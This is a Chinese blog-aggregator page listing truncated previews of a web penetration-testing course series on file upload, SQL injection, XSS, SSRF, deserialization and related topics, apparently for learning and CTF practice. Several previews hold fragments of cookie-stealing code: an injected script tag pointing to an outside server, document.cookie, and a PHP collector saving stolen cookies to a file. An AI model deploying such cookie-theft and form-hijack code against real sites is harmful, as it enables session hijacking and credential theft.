代码编织梦想

day33 文件上传&中间件解析漏洞&编辑器安全_第33天:web攻防-爱代码爱编程

前言 先判断中间件,是否有解析漏洞,字典扫描拿到上传点,或者会员中心,有可能存在文件上传的地方,而后测试绕过/验证,根据实际情况判断是白名单、黑名单还是内容其他的绕过,绕过/验证和中间件的解析漏洞也不行的话就看看CMS是否存在漏洞,然后看看编辑器漏洞有无以及其他漏洞如CVE漏洞。 知识汇总 1. 各个平台解析漏洞讲解 📎web中间件常见漏洞

day30 sql注入&ctf&二次&堆叠&dns带外_第30天:web攻防-爱代码爱编程

二次注入 原理 二次注入是存储型注入,可以理解为构造恶意数据存储在数据库后,恶意数据被读取并进入到了SQL查询语句所导致的注入。恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。详细点来讲,就是在第一次进行数据库插入数据的时候,仅仅只是使用了 addslash

day 32 文件上传&二次渲染&.htaccess&变异免杀_文件上传二次渲染-爱代码爱编程

前言: #知识点: 1、文件上传-二次渲染 2、文件上传-简单免杀变异 3、文件上传-.htaccess妙用 4、文件上传-PHP语言特性 #详细点: 1、检测层面:前端,后端等 2、检测内容:文件头,完整性,二次渲染等 3、检测后缀:黑名单,白名单,MIME检测等 4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等 #本

day34 文件上传&黑白盒审计&逻辑&中间件&外部引用_ctf比赛能删除中间件吗-爱代码爱编程

前言 #知识点: 1、白盒审计三要素 2、黑盒审计四要素 3、白黑测试流程思路 #详细点: 1、检测层面:前端,后端等 2、检测内容:文件头,完整性,二次渲染等 3、检测后缀:黑名单,白名单,MIME检测等 4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等 #本章课程内容: 1、文件上传-CTF赛题知识点 2、文件上传

day35 xss跨站&反射&存储&dom&盲打&劫持-爱代码爱编程

前言 #知识点: 1、XSS跨站-原理&攻击&分类等 2、XSS跨站-反射型&存储型&DOM型等 3、XSS跨站-攻击手法&劫持&盗取凭据等 4、XSS跨站-攻击项目&XSS平台&Beef-XSS 1、原理 指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用

day36 xss跨站&mxss&uxss&flashxss&pdfxss-爱代码爱编程

前言 #知识点: 1、XSS跨站-原理&攻击&分类等 2、XSS跨站-MXSS&UXSS&FlashXss&PDFXSS等 1、原理 指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击

day37 xss跨站&权限维持&钓鱼捆绑&浏览器漏洞_xss权限维持-爱代码爱编程

#XSS-后台植入Cookie&表单劫持 -条件:已取得相关web权限后 1、写入代码到登录成功文件,利用beef或xss平台实时监控Cookie等凭据实现权限维持 2、若存在同源策略或防护情况下,Cookie获取失败可采用表单劫持或数据明文传输实现 将账户密码发到某个地方 $变量=<script src="http://www.

day38 xss跨站&绕过修复&http_only&csp&标签符号_xsspayload绕过csp-爱代码爱编程

XSS绕过-CTFSHOW-361到331关卡绕过WP 前言: document.cookie//获取当前浏览器cookie信息 windows.location.her="xxxx.com'去访问目标网站 GET.PHP? <?PHP $cookie=$_GET['c']; $myfile = fopen("cookie.txt","

day29 sql注入&增删改查&盲注&延时&布尔&报错-爱代码爱编程

前言 #知识点: 1、明确查询方式注入Payload 2、明确查询方式注入产生功能 3、明确SQL盲注延时&布尔&报错 #详细点: 盲注就是在注入过程中,获取的数据不能回显至前端页面。 此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 解决:常规的联合查询注入不行的情况 我们可以知道盲注分为以下三类:

day55 数据库安全&redis&hadoop&mysql&未授权访问&rce-爱代码爱编程

#知识点: 1、服务攻防-数据库类型安全 2、Redis&Hadoop&Mysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不当未授权三重奏&RCE漏洞 3、Redis-配置不当未授权三重奏&RCE两漏洞 #章节内容: 常见服务应用的安全测试: 1、配置不当-未授权访

day54 跨域cors资源&jsonp回调&域名接管劫持-爱代码爱编程

前言: #知识点: 1、子域名接管-检测&探针&利用 2、COSP跨域资源-检测&探针&利用 3、JSONP跨域回调-检测&探针&利用 #前置知识点: -同源策略(SOP)-“同源”包括三个条件:同协议 同域名 同端口 同源策略限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这

day49 业务逻辑&水平垂直越权&访问控制&脆弱验证-爱代码爱编程

前言: #知识点: 1、水平越权-同级用户权限共享 2、垂直越权-低高用户权限共享 3、访问控制-验证丢失&取消验证 4、脆弱验证-Cookie&Token&Jwt等 #前置知识: 1、逻辑越权原理- -水平越权:用户信息获取时未对用户与ID比较判断直接查询等 -垂直越权:数据库中用户类型编号接受篡改或高权

day46 php反序列化&原生类&漏洞绕过&公私有属性-爱代码爱编程

#方法&属性-调用详解&变量数据详解 对象变量属性: public(公共的):在本类内部、外部类、子类都可以访问 protect(受保护的):只有本类或子类或父类中可以访问 private(私人的):只有本类内部可以使用 序列化数据显示: private属性序列化的时候格式是%00类名%00成员名 protect属性序列化

day45 php反序列化&pop链构造&魔术方法&原生类-爱代码爱编程

前言 #知识点: 1、什么是反序列化操作?-格式转换 2、为什么会出现安全漏洞?-魔术方法 3、反序列化漏洞如何发现? -对象逻辑 4、反序列化漏洞如何利用?-POP链构造 补充:反序列化利用大概分类三类 -魔术方法的调用逻辑-如触发条件 -语言原生类的调用逻辑-如SoapClient -语言自身的安全缺陷-如CVE-2016-712

day45 php反序列化&pop链构造&魔术方法&原生类-爱代码爱编程

前言 #知识点: 1、什么是反序列化操作?-格式转换 2、为什么会出现安全漏洞?-魔术方法 3、反序列化漏洞如何发现? -对象逻辑 4、反序列化漏洞如何利用?-POP链构造 补充:反序列化利用大概分类三类 -魔术方法的调用逻辑-如触发条件 -语言原生类的调用逻辑-如SoapClient -语言自身的安全缺陷-如CVE-2016-7124

day 44 rce&代码执行&命令执行&多层面检测利用-爱代码爱编程

前言: #知识点: 1、RCE执行-代码执行&命令执行 2、CTF考点-漏洞配合&绕过手法 3、利用审计-CMS框架&中间件等 #详细点: 1.为什么会产生此类安全问题 2.此类安全问题探针利用及危害 3.此类安全问题在CTF即CMS分析 漏洞场景:代码会调用自身的脚本代码执行,也会调用系统命令执行 漏洞区别

day43 任意文件下载&删除重装&敏感读取&黑白审计-爱代码爱编程

前言: #知识点: 1、文件操作类安全问题 2、文件下载&删除&读取 3、白盒&黑盒&探针分析 #详细点: 文件读取:基本和文件下载利用类似 文件下载:利用下载获取源码或数据库配置文件及系统敏感文件为后续出思路 文件删除:除自身安全引发的文件删除外,可配合删除重装锁定文件进行重装 #白盒审计: 1

day39 csrf&ssrf&协议玩法&内网探针&漏洞利用-爱代码爱编程

前言: #知识点: 1、CSRF-原理&危害&探针&利用等 2、SSRF-原理&危害&探针&利用等 3、CSRF&SSRF-黑盒下漏洞探针点 详细点: CSRF 全称:Cross-site request forgery,即,跨站请求伪造,也被称为 “One Click Atta

day28 sql注入&http头xff&cookie&post请求_准时不早退的丁真的博客-爱代码爱编程

前言 #知识点: 1、数据请求方式-GET&POST&COOKIE等 2、常见功能点请求方式-用户登录&IP记录等 3、黑盒白盒注入测试要点-SQLMAP注入参数 #补充点: 黑盒测试:功能点分析 1、后台要记录操作访问IP IP要进行代码的获取,获取到之后,IP会不会记录到数据库中呢? IP会写到数据库,如果

【无标题】_准时不早退的丁真的博客-爱代码爱编程

前言 #知识点: 1、SQL注入-MYSQL数据库 2、SQL注入-MSSQL数据库 3、SQL注入-PostgreSQL数据库 #详细点: Access无高权限注入点-只能猜解,还是暴力猜解 MYSQL,PostgreSQL,MSSQL高权限注入点-可升级读写执行等 #MYSQL-root高权限读写注入 -读取文件: UNIONS